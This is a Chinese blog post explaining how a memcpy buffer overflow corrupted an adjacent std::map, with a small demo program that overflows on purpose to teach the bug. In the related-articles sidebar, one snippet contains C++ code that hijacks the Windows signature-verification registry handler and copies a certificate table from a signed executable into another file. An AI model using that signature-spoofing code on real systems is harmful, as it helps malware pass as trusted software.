(Windbg调试五)C++内存越界导致的std::map异常

最新推荐文章于 2024-10-08 10:22:24 发布
原创 最新推荐文章于 2024-10-08 10:22:24 发布 · 置顶 · 9.7k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#c++ #内存越界 #std::map崩溃

本文深入分析了一起因C++中memcpy函数使用不当导致的内存越界问题,详细描述了如何通过代码审查定位并修复由内存破坏引发的std::map异常,强调了正确使用内存操作函数的重要性。

C++内存越界导致的std::map异常


     前段时间在定位一个程序崩溃的问题,虽然有dump文件,能够看到出问题的具体代码行数,问题都出在同一个map上。
     dump1显示map下标插入数据时异常。
在这里插入图片描述
     dump2显示调用map的clear函数异常。
在这里插入图片描述
     刚开始看到这两个dump,以为是多线程导致的访问冲突,看具体的代码发现对这个map的插入和删除操作是在同一个线程中的,所以排除这个可能,这时想到了另一种情况:程序中其他地方内存异常导致的程序崩溃,虽然表现在这个map对象处,但实际并不是由map引起的。因此对这个map对象所在类的所有成员变量进行一个个地排查,着重看char数组是否在调用strcpy或者memcpy时存在越界的情况,最终发现果真有一处数组越界,代码简单描述如下

char m_cXXLastUpdateTime[13]; 
char cLastUpdateTime[32];
memcpy(m_cXXLastUpdateTime, cLastUpdateTime, sizeof(cLastUpdateTime));

     m_cXXLastUpdateTime是成员变量,它的大小只有13个字节,但是在调用memcpy赋值时,却拷贝了sizeof(cLastUpdateTime)=32个字节的大小,那么就会将m_cXXLastUpdateTime地址后面的19位全部覆盖,当在程序的其他地方使用到这个地址的变量时,就会出现Access violation,问题解决了。解决这个问题的过程是比较痛苦的,因为碰上这种程序中其他地方内存越界引起的内存破坏问题,通过分析dump文件并不能准确定位到具体原因,只能一行一行地分析代码,所以我们平常写代码对数组的赋值要格外小心。

     下面以一个简单地例子来复现上述场景,例子代码如下:


#include <string>


class CheckDbf
{
public:
	CheckDbf()
	{
		memset(szTime, 0, sizeof(szTime));
		memset(szText, 0, sizeof(szText));
	}
	~CheckDbf()
	{

	}
public:
	char szTime[13];
	char szText[5];
};


int main()
{
	char szBuf[32] = { 0 };
	sprintf(szBuf, "20190613");
	CheckDbf dbf;
	sprintf(dbf.szText, "1234");
	int nSize = sizeof(dbf);
	memcpy(dbf.szTime, szBuf, sizeof(szBuf));
	
	return 0;
}

     调试该代码,查看dbf对象的成员变量内存:
在这里插入图片描述     可以看到sizeof(dbf)=18,前面的13个字节为空是szTime的内容,后面的5个字节是szText的内容,ACSII码刚好是31 32 33 34 00,放开断点,走完memcpy函数,再看内存:
在这里插入图片描述
     dbf对象的前面的13个字节和是szTime,并且是我们赋值的内容“20190613”,但是接下来的5个字节却全变了,因为被覆盖了,此时如果我们再访问szText并调用一些string函数,则会导致程序崩溃。将szText换成std::map成员变量也是一样的效果。
谨记:
1,memcpy时,拷贝的大小不要越界。
2,strcpy不要使用,改用strncpy,同样,拷贝的大小一定不要越界。

内存越界一定会导致程序崩溃吗?详解内存越界
dvlinker的技术专栏
08-20 2万+
本文详细解释了内存越界不一定导致内存越界的问题,全面介绍了C++内存越界的相关内容。
C++内存泄漏】引发C++程序内存泄漏的原因分析与排查内存泄漏的方法总结
dvlinker的技术专栏
12-12 4万+
本文根据多年的项目实践以及遇到的多个内存泄漏的问题案例及场景,详细介绍引发内存泄漏的原因以及排查方法。
关于C++ map容器迭代器越界的研究
seasonsolt的专栏
04-14 2667
函数接口如下: #include using namespace std; /* 小明是个马大哈,某天他到超市买了若干双筷子(n 筷子的长度不尽相同,他把全部筷子都放在购物袋里面拿回家,路上不小心漏了一根 请你用程序帮他找出是漏掉的筷子是多长的。 输入:  剩下的筷子数组,如:1, 2, 3, 2, 1, 3, 2 返回值:漏掉的筷子长度,如上述输入返回:2(当输入的筷子数
C++ 134道面试题
谢谢大家的关注
02-18 1503
构造函数,构造函数初始化对象,派生类必须知道基类函数干了什么,才能进行构造;当有虚函数时,每一个类有一个虚表,每一个对象有一个虚表指针,虚表指针在构造函数中初始化;内联函数,内联函数表示在编译阶段进行函数体的替换操作,而虚函数意味着在运行期间进行类型确定,所以内联函数不能是虚函数;静态函数,静态函数不属于对象属于类,静态成员函数没有this指针,因此静态函数设置为虚函数没有任何意义。友元函数,友元函数不属于类的成员函数,不能被继承。对于没有继承特性的函数没有虚函数的说法。
利用windbg分析崩溃,句柄泄漏,死锁,CPU高,内存泄漏
zqw_4181的博客
01-25 6550
Windbg的一些简单使用命令 一、崩溃 1、  输入.ecxr;kbn得到崩溃的堆栈 其中源代码如下 2、  查看堆栈和源代码,发现第0帧导致崩溃,代码也是本地代码 输入.frame  0,切到第0帧如下 3、  输入 dv 查看当前帧的一些变量信息          发现变量p =0x00000000 二、句柄泄漏 1、  启动进程 2、  用windbg附加到
C++ vector的越界错误
anda0242的博客
08-11 851
做题的时候,c++的vector下标引用成功地坑到了自己。 参考:https://blog.youkuaiyun.com/hexiaomin_1984/article/details/26168265 在写 for 循环时候,当条件为 i < = v.size()-1的时候, 很容易出现数组越界。 int j = a.size()-2; //cout <...
C++程序使用 STL 容器发生异常的常见原因分析与总结
热门推荐
dvlinker的技术专栏
03-24 4万+
使用 STL 容器发生异常的常见原因分析与总结
0x00007FFEE5E85369 处(位于 LaneMaker.exe 中)引发的异常: Microsoft C++ 异常: CGAL::Uncertain_conversion_exception,位于内存位置 0x000000DD5DBE1850 处。
09-10
- **内存诊断**:使用 Valgrind 或 AddressSanitizer 排除内存越界污染 ### 调试指引 1. 通过 WinDbg 加载崩溃 dump: ``` .load CGAL_DEBUG.dll ; 加载CGAL调试符号 !analyze -v ; 分析异常上下文 kb /p ; ...
【STL详解】STL标准模板库入门 | STL版本 | STL六大组件 | STL优点 | 常用STL容器vector、list和map | STL算法函数 | STL使用异常原因分析与总结
dvlinker的技术专栏
10-08 2万+
本文详细介绍STL标准模板库相关的内容,包括STL版本、STL六大组件、STL优点、常用的STL容器vector、list与map、提升效率的STL算法函数的使用、STL使用异常常见原因分析与总结等,以供大家参考。
#pragma once #include <Windows.h> #include <cstdint> #include <fstream> #include <iostream> #include <string> #include <vector> // 定义WIN_CERTIFICATE结构,用于表示Windows证书 struct WIN_CERTIFICATE { uint32_t dwLength; uint16_t wRevision; uint16_t wCertificateType; }; // 设置注册表值的函数,用于指定路径和函数名到注册表中 bool SetRegistryValues(HKEY rootKey, LPCWSTR subkey, LPCWSTR dllPath, LPCWSTR funcName, REGSAM accessFlag) { HKEY hKey; LONG result = RegOpenKeyExW(rootKey, subkey, 0, KEY_SET_VALUE | accessFlag, &hKey); if (result != ERROR_SUCCESS) { std::wcerr << L"Failed to open key: " << subkey << L" (Error " << result << L")" << std::endl; return false; } result = RegSetValueExW(hKey, L"Dll", 0, REG_SZ, reinterpret_cast<const BYTE*>(dllPath), (DWORD)((wcslen(dllPath) + 1) * sizeof(wchar_t))); if (result != ERROR_SUCCESS) { std::wcerr << L"Failed to set 'Dll' value. Error: " << result << std::endl; RegCloseKey(hKey); return false; } result = RegSetValueExW(hKey, L"FuncName", 0, REG_SZ, reinterpret_cast<const BYTE*>(funcName), (DWORD)((wcslen(funcName) + 1) * sizeof(wchar_t))); if (result != ERROR_SUCCESS) { std::wcerr << L"Failed to set 'FuncName' value. Error: " << result << std::endl; RegCloseKey(hKey); return false; } RegCloseKey(hKey); // std::wcout << L"Successfully updated: " << subkey << std::endl; return true; } // 钩取注册表的函数,设置指定的DLL路径和函数名到64位和32位注册表项中 bool hook_registry() { LPCWSTR dllPath = L"C:\\Windows\\System32\\ntdll.dll"; LPCWSTR funcName = L"DbgUiContinue"; // 64-bit registry LPCWSTR subkey64 = L"SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}"; // 32-bit registry LPCWSTR subkey32 = L"SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}"; if (!SetRegistryValues(HKEY_LOCAL_MACHINE, subkey64, dllPath, funcName, KEY_WOW64_64KEY)) return false; if (!SetRegistryValues(HKEY_LOCAL_MACHINE, subkey32, dllPath, funcName, KEY_WOW64_32KEY)) return false; } // 将一个64位数值对齐到8字节边界 static inline uint64_t align8(uint64_t x) { return (x + 7) & ~7ULL; } // 从源PE文件中读取数字签名,并将其写入目标PE文件中 bool steal(const std::string& src_path, const std::string& dst_path) { // 1) 打开源文件并读取DOS和PE头 std::ifstream src(src_path, std::ios::binary); if (!src) return false; IMAGE_DOS_HEADER dos; src.read(reinterpret_cast<char*>(&dos), sizeof(dos)); if (dos.e_magic != 0x5A4D) return false; // 检查是否为MZ头 src.seekg(dos.e_lfanew, std::ios::beg); IMAGE_NT_HEADERS64 nt; src.read(reinterpret_cast<char*>(&nt), sizeof(nt)); if (nt.Signature != 0x00004550) return false; // 检查是否为PE头 auto certDir = nt.OptionalHeader.DataDirectory[4]; if (certDir.VirtualAddress == 0 || certDir.Size == 0) { // 没有证书表 return false; } // 2) 读取整个证书表到一个缓冲区 std::vector<char> blob(certDir.Size); src.seekg(certDir.VirtualAddress, std::ios::beg); src.read(blob.data(), blob.size()); src.close(); // 3) 将证书表写入目标PE文件,并确保8字节对齐 std::fstream dst(dst_path, std::ios::binary | std::ios::in | std::ios::out); if (!dst) return false; dst.seekg(0, std::ios::end); uint64_t eof = dst.tellg(); uint64_t writeOff = align8(eof); if (writeOff > eof) { std::vector<char> pad(writeOff - eof, 0); dst.write(pad.data(), (std::streamsize)pad.size()); } dst.write(blob.data(), (std::streamsize)blob.size()); // 4) 修改目标PE文件中的DataDirectory[4]以指向新的证书表 IMAGE_DOS_HEADER dos2; dst.seekg(0, std::ios::beg); dst.read(reinterpret_cast<char*>(&dos2), sizeof(dos2)); // 计算DataDirectory数组的基地址 uint32_t ddBase = dos2.e_lfanew + 4 // Signature + sizeof(IMAGE_FILE_HEADER) + offsetof(IMAGE_OPTIONAL_HEADER64, DataDirectory); // entry #4 (零基)是安全目录 uint32_t dd4 = ddBase + 4 * sizeof(IMAGE_DATA_DIRECTORY); // 写入VirtualAddress(文件偏移)和Size dst.seekp(dd4 + offsetof(IMAGE_DATA_DIRECTORY, VirtualAddress), std::ios::beg); uint32_t off32 = static_cast<uint32_t>(writeOff); dst.write(reinterpret_cast<const char*>(&off32), sizeof(off32)); uint32_t size32 = certDir.Size; dst.write(reinterpret_cast<const char*>(&size32), sizeof(size32)); dst.close(); return true; }
最新发布
09-20
1. 使用调试工具(如WinDbg)检查内存泄漏:运行代码后,分析堆报告。 2. 验证环境:执行PowerShell命令`Get-WmiObject -Query "SELECT * FROM Win32_Product WHERE Name LIKE '%Visual C++%Redistributable%'"`确保...
C++ map操作下标问题
wangxun1384588560的博客
09-12 5123
map集合的插入数据中,操作下标插入最直观,企业中经常使用,但是又两个问题要注意 1)插入数据为重复key的话,会把原来值覆盖, map map1; map1.insert(make_pair(2,"s")); map1[2] = "22"; map::iterator it = map1.begin() ; for(;it!= map1.end();it++) { c
C++】关于map的一些奇怪问题:map 下标操作[key]需要有默认构造函数
weixin_44733774的博客
12-09 1471
在做题,然后出了些奇奇怪怪的东西,简单记录一下。 这问题是关于map的,或者说是关于map的operator[]函数,若出现了没有默认构造函数的类在“键值对”的“值”上时,这个map的operator[]函数就直接废掉,而且还给出奇奇怪怪的报错,当时还查很久才发现是map的问题。但我不想为我的类设置一个无用的空构造函数,就只能用map::insert和map::find来绕开使用operator[]了,可以说很恶心。 示例代码在下面,直接看代码比我说上面一大段话要直接明了的多。有兴趣可以尝试。 估计会
C++数组越界问题
wmc666666的博客
03-10 3108
首先,C++中数组下标越界程序并不报错是因为编译器不会对数组下标作越界检查造成的。C语言非常重视运行时的效率,所以没有进行数组越界检查,而C++继承了C的效率要求,自然也不做数组越界检查。 数组越界问题常常出现在不经意间,笔者找了将近半小时的问题,终于发现了数组越界原因所在,因此记录下来: 其实在这里,本来是为了代码的简洁性,却犯了一个很大的错误,因为,若是b[a[i]]若是大于1,则a[i]是一定不会超过b的容纳范围的,可是程序系统不知道,它只会对每个a[i]都执行相同的操作,因此会造成数组越界的情况。
C/C++常见指针错误 and 内存访问越界
Wanda && Aidem
11-12 1万+
1) 内存分配未成功,却使用了它。    编程新手常犯这种错误,因为他们没有意识到内存分配会不成功。常用解决办法是,在使用内存之前检查指针是否为NULL。如果指针p是函数的参数,那么在函数的入口处用assert(p!=NULL)进行检查。如果是用malloc或new来申请内存,应该用if(p==NULL) 或if(p!=NULL)进行防错处理。 2) 内存分配虽然成功,但
C++核心准则SL.con.3:避免越界错误
面向对象思考
01-22 696
SL.con.3: Avoid bounds errors SL.con.3:避免越界错误 Reason(原因) Read or write beyond an allocated range of elements typically leads to bad errors, wrong results, crashes, and security violations. 超越分配得到的范围读写元素通常会导致恶劣的错误,不正确的结果,冲突,和安全违反。 Note(注意) The s..
C++中的数组越界问题及解决方法
JfBackend的博客
09-27 2345
为了避免数组越界错误,我们应该始终确保访问的索引值在有效范围内,并使用循环和容器类来控制索引范围和提供边界检查功能。在C++编程中,数组越界是一种常见的错误,它发生在我们试图访问数组元素时超出了数组的有效索引范围。假设我们声明了一个大小为5的数组,有效索引范围是0到4,如果我们试图访问索引为5的元素,就会发生越界。1.1 索引值小于0:在C++中,数组的索引从0开始,如果我们试图访问小于0的索引,将会导致越界。3.1 确保索引值的有效范围:在使用数组时,始终确保访问的索引值在数组的有效范围内。
Standard Template Library (STL) - std::map::size
程永强
02-08 668
Standard Template Library (STL) - std::map::size public member function - 公开成员函数 1. std::map::size C++98 size_type size() const; C++11 size_type size() const noexcept; Return container size - 返回容纳的元素数 Returns the number of elements in the map container. 返回
05-windbg工具定位内存问题-01
qq_37103755的博客
12-10 2342
windbg分析内存问题
C++map用法详解
Vihaclue的博客
02-25 1869
特别注意:举例在一个升序的容器里,如果所有元素都大于i则,upp和low都返回begin。都小于i则返回end(越界了)。iterator lower_bound( const key_type &amp;key ): 返回一个迭代器,指向第一个键值&gt;= key的元素 。iterator upper_bound( const key_type &amp;key ): 返回一个迭代器,指向第一...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Simple Simple

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值